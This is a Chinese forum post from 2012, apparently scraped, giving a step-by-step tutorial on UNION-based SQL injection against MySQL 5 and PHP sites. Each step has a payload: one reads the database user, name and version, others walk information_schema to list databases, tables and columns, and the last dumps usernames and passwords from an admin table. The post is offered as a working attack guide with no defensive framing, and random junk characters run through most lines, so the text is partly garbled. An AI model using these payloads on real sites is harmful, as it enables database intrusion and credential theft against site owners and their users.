j% n* ?2 L3 H! T& S6 \
教程内容:Mysql 5+php 注入
9 N+ r6 j; t* Q0 L5 a# ^5 `8 S2 Y( i5 ]+ }/ d7 G3 t4 O! _* ]
3 l# o2 M* v! v9 S- @
2 y7 I% _( ?* W一.查看MYSQL基本信息(库名,版本,用户)5 \0 d6 R; o0 ?9 H9 m, R9 b `0 u
8 C( @6 V6 Z- Yand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
1 x1 a$ c6 u. Y
8 @, ^+ m, X: z% l% r二.查数据库0 v# a# s$ N& d& ]5 N! d% `/ f5 o
3 ^ W% z( p: e. L: g% _( p( xand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*- z0 `% g) B) j2 r+ ~
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。4 {0 c1 j, E4 {' A, A$ f+ S
0 B5 \2 j' h5 s) l# A I三.暴表0 E, e! e: C% h; B7 l
) C3 V# }' A# U6 o
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
+ v" c- l! h% U8 w T8 Z: {! x% j3 P- n+ B) ^) i2 b4 w
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
- a+ ?' c: L* `9 i" {" \/ {8 b; b; }5 F/ @0 L( O4 O! W- z4 g
四.暴字段, i1 u" X2 Q; a9 J- M& v! r$ p2 D
" k; K8 t* ~9 Q2 e& kand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*" Y+ ~# @; K8 l6 K1 D7 a" d( k
5 N. ^" D, E1 L& K, q0 xlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
9 J: v/ w% d% @' m& P: P% s, Z" W$ M+ Z
五.暴数据- U: w, X1 u3 O% W: Y: ?0 Z3 j
* ^" u# r9 o- W' t! _and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
Y, j0 L1 b- m7 N$ @3 m
. f$ Q; K4 y$ I# @: n% v" N, W, O! a# q3 m1 h9 X
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。" ^+ N1 n! R4 F9 Z/ [
|
发表于 2012-9-13 16:27:53
收藏
支持
反对